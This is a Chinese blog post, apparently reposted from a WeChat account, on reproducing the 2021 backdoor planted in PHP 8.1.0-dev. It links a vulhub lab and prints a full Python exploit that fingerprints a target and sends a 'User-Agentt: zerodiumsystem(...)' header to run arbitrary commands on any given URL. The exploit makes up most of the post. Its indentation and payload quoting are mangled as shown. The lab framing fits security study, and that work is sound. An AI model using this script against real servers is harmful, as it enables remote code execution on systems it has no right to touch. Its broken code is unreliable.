0x00:简介
PHP 8.1.0-dev 开发版本在2021年3月28日被植入后门,但是后门很快被发现并修正。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。
0x01:搭建环境
https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
然后访问本地地址
http://127.0.0.1:8080/
0x02:漏洞复现
神秘代码
#!/usr/bin/env python3
import requests
import argparse
from requests.models import parse_header_links
s = requests.Session()
def checkTarget(args):
r = s.get(args.url)
for h in r.headers.items():
if "PHP/8.1.0-dev" in h[1]:
return True
return False
def execCmd(args):
r = s.get(args.url, headers={"User-Agentt":"zerodiumsystem(""+args.cmd+"");"})
res = r.text.split("<!DOCTYPE html>")[0]
if not res:
print("[-] No Results")
else:
print("[+] Results:")
print(res.strip())
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Target URL (Eg: http://127.0.0.1:8080/)", required=True)
parser.add_argument("-c", "--cmd", help="Command to execute (Eg: ls,id,whoami)", default="id")
args = parser.parse_args()
if checkTarget(args):
execCmd(args)
else:
print("[!] Not Vulnerable or url error")
exit(0)
if __name__ == "__main__":
main()
扫码二维码
获取更多精彩
洛米唯熊
点个在看 你最好看
本文始发于微信公众号(洛米唯熊):PHP 8.1.0-dev 开发版本后门复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论